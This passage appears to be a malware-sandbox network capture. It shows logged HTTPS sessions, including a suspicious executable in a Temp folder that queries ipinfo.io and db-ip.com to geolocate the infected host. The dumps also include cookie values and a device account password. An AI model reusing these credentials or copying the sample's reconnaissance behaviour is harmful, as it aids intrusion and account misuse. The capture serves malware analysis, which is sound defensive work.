                                                                                                                                                                                                                                      sec-ch-ua-model: ""
                                                                                                                                                                                                                                      sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Origin: https://accounts.google.com
                                                                                                                                                                                                                                      X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=
                                                                                                                                                                                                                                      Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                      Referer: https://accounts.google.com/
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      Cookie: NID=513=DL6Us8jAPrwCCKarlTw2RsBHsg-PZZE0_IVMLOmld8Vg4EMZhTyE_65f9B0OK-p44_4Uk-puC2a1J_sCfoJnyAtSeJNyRbiKB8AiKkQJAbADm2J1hujbY6LjrFBfHJLMH2_5Lm7sfqr7tbq8PbRvtYkxosEGP0PKBUVLfjHGngA
                                                                                                                                                                                                                                      2024-04-19 01:29:32 UTC927OUTData Raw: 5b 5b 31 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 22 65 6e 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 5b 5b 22 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 22 2c 22 31 31 37 22 5d 2c 5b 22 4e 6f 74 3b 41 3d 42 72 61 6e 64 22 2c 22 38 22 5d 2c 5b 22 43 68 72 6f 6d 69 75 6d 22 2c 22 31 31 37 22 5d 5d 2c 30 2c 22 57 69 6e 64 6f 77 73 22 2c 22 31 30 2e 30 2e 30 22 2c 22 78 38 36 22 2c 22 22 2c 22 31 31 37 2e 30 2e 35 39 33 38 2e 31 33 32 22 5d 2c 5b 34 2c 30 2c 30 2c 30 2c 30 5d 5d 5d 2c 35 35 38 2c 5b 5b 22 31 37 31 33 34 39 30 31 36 31 30 30 30 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c
                                                                                                                                                                                                                                      Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,"en",null,null,null,[[["Google Chrome","117"],["Not;A=Brand","8"],["Chromium","117"]],0,"Windows","10.0.0","x86","","117.0.5938.132"],[4,0,0,0,0]]],558,[["1713490161000",null,null,null,
                                                                                                                                                                                                                                      2024-04-19 01:29:32 UTC925INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://accounts.google.com
                                                                                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                      Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                      Access-Control-Allow-Headers: X-Playlog-Web
                                                                                                                                                                                                                                      Set-Cookie: NID=513=FAR9xw05PYMKi-rL5fgDcMmA3WtllB1CX3U0TQp-ac0aw4OdCXywDmx5f1jGU049Rg-Gx1ncQvL1aX2EByz9BGVRy2z67UdcNvUHQpiFDtfc7hlZfv0TYd6c8WUGzwsVwIaRfByZ-4s0Gl-WscaQ2HFH7yRIDo4q9mTYo3kysTQ; expires=Sat, 19-Oct-2024 01:29:32 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                                                                                                                                                                      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                                                                                      Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:32 GMT
                                                                                                                                                                                                                                      Server: Playlog
                                                                                                                                                                                                                                      Cache-Control: private
                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                      Accept-Ranges: none
                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                      Expires: Fri, 19 Apr 2024 01:29:32 GMT
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      2024-04-19 01:29:32 UTC137INData Raw: 38 33 0d 0a 5b 22 2d 31 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 41 4e 44 52 4f 49 44 5f 42 41 43 4b 55 50 22 2c 30 5d 2c 5b 22 42 41 54 54 45 52 59 5f 53 54 41 54 53 22 2c 30 5d 2c 5b 22 53 4d 41 52 54 5f 53 45 54 55 50 22 2c 30 5d 2c 5b 22 54 52 4f 4e 22 2c 30 5d 5d 2c 2d 33 33 33 34 37 33 37 35 39 34 30 32 34 39 37 31 32 32 35 5d 2c 5b 5d 2c 7b 22 31 37 35 32 33 37 33 37 35 22 3a 5b 31 30 30 30 30 5d 7d 5d 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 83["-1",null,[[["ANDROID_BACKUP",0],["BATTERY_STATS",0],["SMART_SETUP",0],["TRON",0]],-3334737594024971225],[],{"175237375":[10000]}]
                                                                                                                                                                                                                                      2024-04-19 01:29:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      13192.168.2.54980140.126.29.15443
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-04-19 01:29:39 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/soap+xml
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                      Content-Length: 3592
                                                                                                                                                                                                                                      Host: login.live.com
                                                                                                                                                                                                                                      2024-04-19 01:29:39 UTC3592OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                                                      2024-04-19 01:29:39 UTC568INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                      Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                      Expires: Fri, 19 Apr 2024 01:28:39 GMT
                                                                                                                                                                                                                                      P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                      Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                      x-ms-route-info: C555_SN1
                                                                                                                                                                                                                                      x-ms-request-id: 38a12655-86eb-49d3-94d4-d6d5b1d241fc
                                                                                                                                                                                                                                      PPServer: PPV: 30 H: SN1PEPF0002FA3F V: 0
                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:39 GMT
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Content-Length: 1276
                                                                                                                                                                                                                                      2024-04-19 01:29:39 UTC1276INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      14192.168.2.54980640.126.29.15443
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-04-19 01:29:40 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/soap+xml
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                      Content-Length: 3528
                                                                                                                                                                                                                                      Host: login.live.com
                                                                                                                                                                                                                                      2024-04-19 01:29:40 UTC3528OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                                                      2024-04-19 01:29:40 UTC568INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                      Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                      Expires: Fri, 19 Apr 2024 01:28:40 GMT
                                                                                                                                                                                                                                      P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                      Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                      x-ms-route-info: C555_SN1
                                                                                                                                                                                                                                      x-ms-request-id: 4ed3a962-3ed0-46a4-b886-fb8c26a97ee0
                                                                                                                                                                                                                                      PPServer: PPV: 30 H: SN1PEPF0002F0D1 V: 0
                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:40 GMT
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Content-Length: 1276
                                                                                                                                                                                                                                      2024-04-19 01:29:40 UTC1276INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      15192.168.2.54980740.126.29.15443
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-04-19 01:29:40 UTC446OUTPOST /ppsecure/deviceaddcredential.srf HTTP/1.0
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/soap+xml
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                      Content-Length: 7642
                                                                                                                                                                                                                                      Host: login.live.com
                                                                                                                                                                                                                                      2024-04-19 01:29:40 UTC7642OUTData Raw: 3c 44 65 76 69 63 65 41 64 64 52 65 71 75 65 73 74 3e 3c 43 6c 69 65 6e 74 49 6e 66 6f 20 6e 61 6d 65 3d 22 49 44 43 52 4c 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3e 3c 42 69 6e 61 72 79 56 65 72 73 69 6f 6e 3e 32 34 3c 2f 42 69 6e 61 72 79 56 65 72 73 69 6f 6e 3e 3c 2f 43 6c 69 65 6e 74 49 6e 66 6f 3e 3c 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 3e 3c 4d 65 6d 62 65 72 6e 61 6d 65 3e 30 32 6b 65 6e 6f 64 62 6d 72 6b 72 6f 6c 64 6b 3c 2f 4d 65 6d 62 65 72 6e 61 6d 65 3e 3c 50 61 73 73 77 6f 72 64 3e 4c 5a 3f 71 28 78 25 31 2a 49 4a 55 4c 53 21 67 66 6a 49 4a 3c 2f 50 61 73 73 77 6f 72 64 3e 3c 2f 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 3e 3c 4f 6c 64 4d 65 6d 62 65 72 6e 61 6d 65 3e 30 32 76 6e 71 75 73 6b 66 70 70 70 63 69 76 63 3c 2f 4f 6c 64 4d
                                                                                                                                                                                                                                      Data Ascii: <DeviceAddRequest><ClientInfo name="IDCRL" version="1.0"><BinaryVersion>24</BinaryVersion></ClientInfo><Authentication><Membername>02kenodbmrkroldk</Membername><Password>LZ?q(x%1*IJULS!gfjIJ</Password></Authentication><OldMembername>02vnquskfpppcivc</OldM
                                                                                                                                                                                                                                      2024-04-19 01:29:48 UTC542INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                      Expires: Fri, 19 Apr 2024 01:28:40 GMT
                                                                                                                                                                                                                                      P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                      Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                      x-ms-route-info: C542_SN1
                                                                                                                                                                                                                                      x-ms-request-id: 74302422-c7e0-4e8d-931b-34770226fa1b
                                                                                                                                                                                                                                      PPServer: PPV: 30 H: SN1PEPF0002F0FE V: 0
                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:47 GMT
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Content-Length: 17166
                                                                                                                                                                                                                                      2024-04-19 01:29:48 UTC15842INData Raw: 3c 44 65 76 69 63 65 41 64 64 52 65 73 70 6f 6e 73 65 20 53 75 63 63 65 73 73 3d 22 74 72 75 65 22 3e 3c 73 75 63 63 65 73 73 3e 74 72 75 65 3c 2f 73 75 63 63 65 73 73 3e 3c 70 75 69 64 3e 30 30 31 38 43 30 30 44 41 38 44 39 35 32 31 32 3c 2f 70 75 69 64 3e 3c 44 65 76 69 63 65 54 70 6d 4b 65 79 53 74 61 74 65 3e 33 3c 2f 44 65 76 69 63 65 54 70 6d 4b 65 79 53 74 61 74 65 3e 3c 4c 69 63 65 6e 73 65 20 43 6f 6e 74 65 6e 74 49 44 3d 22 33 32 35 32 62 32 30 63 2d 64 34 32 35 2d 34 37 31 31 2d 38 63 63 35 2d 62 32 66 35 33 63 38 33 30 62 37 36 22 20 49 44 3d 22 31 62 61 64 31 61 36 37 2d 65 65 62 37 2d 34 35 61 61 2d 62 66 32 31 2d 30 32 64 30 35 36 39 33 64 62 34 33 22 20 4c 69 63 65 6e 73 65 49 44 3d 22 33 32 35 32 62 32 30 63 2d 64 34 32 35 2d 34 37 31 31
                                                                                                                                                                                                                                      Data Ascii: <DeviceAddResponse Success="true"><success>true</success><puid>0018C00DA8D95212</puid><DeviceTpmKeyState>3</DeviceTpmKeyState><License ContentID="3252b20c-d425-4711-8cc5-b2f53c830b76" ID="1bad1a67-eeb7-45aa-bf21-02d05693db43" LicenseID="3252b20c-d425-4711
                                                                                                                                                                                                                                      2024-04-19 01:29:48 UTC1324INData Raw: 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 39 2f 78 6d 6c 64 73 69 67 23 65 6e 76 65 6c 6f 70 65 64 2d 73 69 67 6e 61 74 75 72 65 22 2f 3e 3c 2f 54 72 61 6e 73 66 6f 72 6d 73 3e 3c 44 69 67 65 73 74 4d 65 74 68 6f 64 20 41 6c 67 6f 72 69 74 68 6d 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 30 34 2f 78 6d 6c 65 6e 63 23 73 68 61 32 35 36 22 2f 3e 3c 44 69 67 65 73 74 56 61 6c 75 65 3e 67 74 71 77 70 52 35 66 47 44 61 6f 48 73 4d 37 49 57 47 4b 5a 67 61 77 58 61 30 42 50 69 47 61 65 35 62 49 75 6e 2f 52 51 4a 41 3d 3c 2f 44 69 67 65 73 74 56 61 6c 75 65 3e 3c 2f 52 65 66 65 72 65 6e 63 65 3e 3c 2f 53 69 67 6e 65 64 49 6e 66 6f 3e 3c 53 69 67 6e 61 74 75 72 65 56 61 6c 75 65 3e 41 46 38 6f 46 52 2b 47 66
                                                                                                                                                                                                                                      Data Ascii: tp://www.w3.org/2000/09/xmldsig#enveloped-signature"/></Transforms><DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/><DigestValue>gtqwpR5fGDaoHsM7IWGKZgawXa0BPiGae5bIun/RQJA=</DigestValue></Reference></SignedInfo><SignatureValue>AF8oFR+Gf


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      16192.168.2.54981134.117.186.1924437988C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-04-19 01:29:41 UTC237OUTGET /widget/demo/81.181.57.52 HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Referer: https://ipinfo.io/
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Host: ipinfo.io
                                                                                                                                                                                                                                      2024-04-19 01:29:42 UTC513INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      server: nginx/1.24.0
                                                                                                                                                                                                                                      date: Fri, 19 Apr 2024 01:29:41 GMT
                                                                                                                                                                                                                                      content-type: application/json; charset=utf-8
                                                                                                                                                                                                                                      Content-Length: 980
                                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                      x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                                                                                      referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                      x-envoy-upstream-service-time: 2
                                                                                                                                                                                                                                      via: 1.1 google
                                                                                                                                                                                                                                      strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      2024-04-19 01:29:42 UTC742INData Raw: 7b 0a 20 20 22 69 6e 70 75 74 22 3a 20 22 38 31 2e 31 38 31 2e 35 37 2e 35 32 22 2c 0a 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 22 69 70 22 3a 20 22 38 31 2e 31 38 31 2e 35 37 2e 35 32 22 2c 0a 20 20 20 20 22 63 69 74 79 22 3a 20 22 41 74 6c 61 6e 74 61 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 47 65 6f 72 67 69 61 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 6c 6f 63 22 3a 20 22 33 33 2e 37 34 39 30 2c 2d 38 34 2e 33 38 38 30 22 2c 0a 20 20 20 20 22 6f 72 67 22 3a 20 22 41 53 32 31 32 32 33 38 20 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 0a 20 20 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 33 30 33 30 32 22 2c 0a 20 20 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a 20 22 41 6d 65 72 69 63 61 2f
                                                                                                                                                                                                                                      Data Ascii: { "input": "81.181.57.52", "data": { "ip": "81.181.57.52", "city": "Atlanta", "region": "Georgia", "country": "US", "loc": "33.7490,-84.3880", "org": "AS212238 Datacamp Limited", "postal": "30302", "timezone": "America/
                                                                                                                                                                                                                                      2024-04-19 01:29:42 UTC238INData Raw: 61 64 64 72 65 73 73 22 3a 20 22 41 76 65 72 65 73 63 75 20 4d 61 72 65 73 61 6c 20 38 2d 31 30 2c 20 42 75 63 68 61 72 65 73 74 2c 20 52 6f 6d 61 6e 69 61 22 2c 0a 20 20 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 52 4f 22 2c 0a 20 20 20 20 20 20 22 65 6d 61 69 6c 22 3a 20 22 61 62 75 73 65 2d 62 69 6e 62 6f 78 40 72 6e 63 2e 72 6f 22 2c 0a 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 41 62 75 73 65 20 63 6f 6e 74 61 63 74 20 72 6f 6c 65 20 6f 62 6a 65 63 74 22 2c 0a 20 20 20 20 20 20 22 6e 65 74 77 6f 72 6b 22 3a 20 22 38 31 2e 31 38 31 2e 34 38 2e 30 2f 32 30 22 2c 0a 20 20 20 20 20 20 22 70 68 6f 6e 65 22 3a 20 22 2b 34 30 20 33 37 38 20 36 30 30 20 30 30 30 22 0a 20 20 20 20 7d 0a 20 20 7d 0a 7d
                                                                                                                                                                                                                                      Data Ascii: address": "Averescu Maresal 8-10, Bucharest, Romania", "country": "RO", "email": "abuse-binbox@rnc.ro", "name": "Abuse contact role object", "network": "81.181.48.0/20", "phone": "+40 378 600 000" } }}


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      17192.168.2.549813104.26.5.154437988C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-04-19 01:29:42 UTC261OUTGET /demo/home.php?s=81.181.57.52 HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Host: db-ip.com
                                                                                                                                                                                                                                      2024-04-19 01:29:42 UTC658INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:42 GMT
                                                                                                                                                                                                                                      Content-Type: application/json
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      x-iplb-request-id: 6CA2ED8C:B06E_93878F2E:0050_6621C906_8C8571C:4F34
                                                                                                                                                                                                                                      x-iplb-instance: 59215
                                                                                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3IvpEAc3hK%2BBEjeUo%2B4GTEWqbbfO93DP8ixRzxERmVfwJgVVI9tRBlQLuZ1tg6Nby%2BcT4ZIBetnXnmfFzpobnNAGL614KEbaF%2FGXP%2Fhx16ZLAfvnSt2gHol4dA%3D%3D"}],"group":"cf-nel","max_age":604800}
